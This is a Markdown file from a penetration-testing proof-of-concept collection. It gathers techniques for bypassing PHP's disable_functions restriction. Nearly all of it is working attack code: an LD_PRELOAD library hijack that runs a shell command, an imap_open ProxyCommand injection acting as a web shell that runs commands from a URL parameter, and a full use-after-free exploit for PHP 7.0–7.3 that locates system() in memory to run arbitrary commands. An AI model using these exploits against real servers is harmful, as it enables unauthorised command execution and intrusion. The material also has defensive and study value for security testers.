mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-08-12 19:16:25 +00:00
308 lines
7.8 KiB
Markdown
308 lines
7.8 KiB
Markdown
# 绕过disable_function汇总
|
||
|
||
## 第一种方式—利用LD_PRELOAD
|
||
|
||
```php
|
||
<?php
|
||
putenv("LD_PRELOAD=/tmp/hack.so");
|
||
mail("a@localhost", "", "", "", "");
|
||
//error_log("a",1);
|
||
?>
|
||
```
|
||
```c
|
||
#include <stdlib.h>
|
||
#include <stdio.h>
|
||
#include <string.h>
|
||
|
||
void payload() {
|
||
system("rm /tmp/check.txt");
|
||
}
|
||
|
||
int geteuid() {
|
||
if (getenv("LD_PRELOAD") == NULL) { return 0; }
|
||
unsetenv("LD_PRELOAD");
|
||
payload();
|
||
}
|
||
|
||
/*
|
||
$ gcc -c -fPIC hack.c -o hack
|
||
$ gcc -shared hack -o hack.so
|
||
*/
|
||
```
|
||
|
||
## 第二种模式— -imap_open
|
||
|
||
```php
|
||
<?php
|
||
# https://antichat.com/threads/463395/#post-4254681
|
||
# # echo '1234567890'>/tmp/test0001
|
||
|
||
error_reporting(0);
|
||
if (!function_exists('imap_open')) {
|
||
die("no imap_open function!");
|
||
}
|
||
|
||
$server = "x -oProxyCommand=echo\t" . base64_encode($_GET['cmd'] . ">/tmp/cmd_result") . "|base64\t-d|sh}";
|
||
imap_open('{' . $server . ':143/imap}INBOX', '', ''); // or var_dump("\n\nError: ".imap_last_error());
|
||
echo file_get_contents("/tmp/cmd_result");
|
||
```
|
||
|
||
## 第三种模式— -exec
|
||
|
||
```php
|
||
<?php
|
||
echo exec("ls",$file);
|
||
echo "</br>";
|
||
print_r($file);
|
||
?>
|
||
```
|
||
|
||
## 第四种模式— -passthru
|
||
|
||
```php
|
||
<?php
|
||
passthru("ls");
|
||
?>
|
||
```
|
||
|
||
## 第五种模式— -system()
|
||
|
||
```php
|
||
<?php
|
||
system('ls');
|
||
?>
|
||
```
|
||
|
||
## 第六种模式—–fpm
|
||
|
||
[从蚁剑插件看利用PHP-FPM绕过disable_functions](https://www.mi1k7ea.com/2019/08/03/%E4%BB%8E%E8%9A%81%E5%89%91%E6%8F%92%E4%BB%B6%E7%9C%8B%E5%88%A9%E7%94%A8PHP-FPM%E7%BB%95%E8%BF%87disable-functions/)
|
||
[PHP 连接方式&攻击PHP-FPM&*CTF echohub WP](https://evoa.me/index.php/archives/52/)
|
||
|
||
## 第七种模式–PHP 7.0 < 7.3 (Unix) - ‘gc’ Disable Functions Bypass
|
||
|
||
```php
|
||
<?php
|
||
|
||
# PHP 7.0-7.3 disable_functions bypass PoC (*nix only)
|
||
#
|
||
# Bug: https://bugs.php.net/bug.php?id=72530
|
||
#
|
||
# This exploit should work on all PHP 7.0-7.3 versions
|
||
# released as of 04/10/2019, specifically:
|
||
#
|
||
# PHP 7.0 - 7.0.33
|
||
# PHP 7.1 - 7.1.31
|
||
# PHP 7.2 - 7.2.23
|
||
# PHP 7.3 - 7.3.10
|
||
#
|
||
# Author: https://github.com/mm0r1
|
||
|
||
pwn("ls");
|
||
|
||
function pwn($cmd) {
|
||
global $abc, $helper;
|
||
|
||
function str2ptr(&$str, $p = 0, $s = 8) {
|
||
$address = 0;
|
||
for($j = $s-1; $j >= 0; $j--) {
|
||
$address <<= 8;
|
||
$address |= ord($str[$p+$j]);
|
||
}
|
||
return $address;
|
||
}
|
||
|
||
function ptr2str($ptr, $m = 8) {
|
||
$out = "";
|
||
for ($i=0; $i < $m; $i++) {
|
||
$out .= chr($ptr & 0xff);
|
||
$ptr >>= 8;
|
||
}
|
||
return $out;
|
||
}
|
||
|
||
function write(&$str, $p, $v, $n = 8) {
|
||
$i = 0;
|
||
for($i = 0; $i < $n; $i++) {
|
||
$str[$p + $i] = chr($v & 0xff);
|
||
$v >>= 8;
|
||
}
|
||
}
|
||
|
||
function leak($addr, $p = 0, $s = 8) {
|
||
global $abc, $helper;
|
||
write($abc, 0x68, $addr + $p - 0x10);
|
||
$leak = strlen($helper->a);
|
||
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
|
||
return $leak;
|
||
}
|
||
|
||
function parse_elf($base) {
|
||
$e_type = leak($base, 0x10, 2);
|
||
|
||
$e_phoff = leak($base, 0x20);
|
||
$e_phentsize = leak($base, 0x36, 2);
|
||
$e_phnum = leak($base, 0x38, 2);
|
||
|
||
for($i = 0; $i < $e_phnum; $i++) {
|
||
$header = $base + $e_phoff + $i * $e_phentsize;
|
||
$p_type = leak($header, 0, 4);
|
||
$p_flags = leak($header, 4, 4);
|
||
$p_vaddr = leak($header, 0x10);
|
||
$p_memsz = leak($header, 0x28);
|
||
|
||
if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
|
||
# handle pie
|
||
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
|
||
$data_size = $p_memsz;
|
||
} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
|
||
$text_size = $p_memsz;
|
||
}
|
||
}
|
||
|
||
if(!$data_addr || !$text_size || !$data_size)
|
||
return false;
|
||
|
||
return [$data_addr, $text_size, $data_size];
|
||
}
|
||
|
||
function get_basic_funcs($base, $elf) {
|
||
list($data_addr, $text_size, $data_size) = $elf;
|
||
for($i = 0; $i < $data_size / 8; $i++) {
|
||
$leak = leak($data_addr, $i * 8);
|
||
if($leak - $base > 0 && $leak - $base < $text_size) {
|
||
$deref = leak($leak);
|
||
# 'constant' constant check
|
||
if($deref != 0x746e6174736e6f63)
|
||
continue;
|
||
} else continue;
|
||
|
||
$leak = leak($data_addr, ($i + 4) * 8);
|
||
if($leak - $base > 0 && $leak - $base < $text_size) {
|
||
$deref = leak($leak);
|
||
# 'bin2hex' constant check
|
||
if($deref != 0x786568326e6962)
|
||
continue;
|
||
} else continue;
|
||
|
||
return $data_addr + $i * 8;
|
||
}
|
||
}
|
||
|
||
function get_binary_base($binary_leak) {
|
||
$base = 0;
|
||
$start = $binary_leak & 0xfffffffffffff000;
|
||
for($i = 0; $i < 0x1000; $i++) {
|
||
$addr = $start - 0x1000 * $i;
|
||
$leak = leak($addr, 0, 7);
|
||
if($leak == 0x10102464c457f) { # ELF header
|
||
return $addr;
|
||
}
|
||
}
|
||
}
|
||
|
||
function get_system($basic_funcs) {
|
||
$addr = $basic_funcs;
|
||
do {
|
||
$f_entry = leak($addr);
|
||
$f_name = leak($f_entry, 0, 6);
|
||
|
||
if($f_name == 0x6d6574737973) { # system
|
||
return leak($addr + 8);
|
||
}
|
||
$addr += 0x20;
|
||
} while($f_entry != 0);
|
||
return false;
|
||
}
|
||
|
||
class ryat {
|
||
var $ryat;
|
||
var $chtg;
|
||
|
||
function __destruct()
|
||
{
|
||
$this->chtg = $this->ryat;
|
||
$this->ryat = 1;
|
||
}
|
||
}
|
||
|
||
class Helper {
|
||
public $a, $b, $c, $d;
|
||
}
|
||
|
||
if(stristr(PHP_OS, 'WIN')) {
|
||
die('This PoC is for *nix systems only.');
|
||
}
|
||
|
||
$n_alloc = 10; # increase this value if you get segfaults
|
||
|
||
$contiguous = [];
|
||
for($i = 0; $i < $n_alloc; $i++)
|
||
$contiguous[] = str_repeat('A', 79);
|
||
|
||
$poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';
|
||
$out = unserialize($poc);
|
||
gc_collect_cycles();
|
||
|
||
$v = [];
|
||
$v[0] = ptr2str(0, 79);
|
||
unset($v);
|
||
$abc = $out[2][0];
|
||
|
||
$helper = new Helper;
|
||
$helper->b = function ($x) { };
|
||
|
||
if(strlen($abc) == 79) {
|
||
die("UAF failed");
|
||
}
|
||
|
||
# leaks
|
||
$closure_handlers = str2ptr($abc, 0);
|
||
$php_heap = str2ptr($abc, 0x58);
|
||
$abc_addr = $php_heap - 0xc8;
|
||
|
||
# fake value
|
||
write($abc, 0x60, 2);
|
||
write($abc, 0x70, 6);
|
||
|
||
# fake reference
|
||
write($abc, 0x10, $abc_addr + 0x60);
|
||
write($abc, 0x18, 0xa);
|
||
|
||
$closure_obj = str2ptr($abc, 0x20);
|
||
|
||
$binary_leak = leak($closure_handlers, 8);
|
||
if(!($base = get_binary_base($binary_leak))) {
|
||
die("Couldn't determine binary base address");
|
||
}
|
||
|
||
if(!($elf = parse_elf($base))) {
|
||
die("Couldn't parse ELF header");
|
||
}
|
||
|
||
if(!($basic_funcs = get_basic_funcs($base, $elf))) {
|
||
die("Couldn't get basic_functions address");
|
||
}
|
||
|
||
if(!($zif_system = get_system($basic_funcs))) {
|
||
die("Couldn't get zif_system address");
|
||
}
|
||
|
||
# fake closure object
|
||
$fake_obj_offset = 0xd0;
|
||
for($i = 0; $i < 0x110; $i += 8) {
|
||
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
|
||
}
|
||
|
||
# pwn
|
||
write($abc, 0x20, $abc_addr + $fake_obj_offset);
|
||
write($abc, 0xd0 + 0x38, 1, 4); # internal func type
|
||
write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
|
||
|
||
($helper->b)($cmd);
|
||
|
||
exit();
|
||
}
|
||
```
|
||
> 第七种引用 https://www.exploit-db.com/exploits/47462
|
||
> 文章来至 [绕过disable_function汇总](https://wulidecade.cn/2019/09/27/%E7%BB%95%E8%BF%87disable-function%E6%B1%87%E6%80%BB/)
|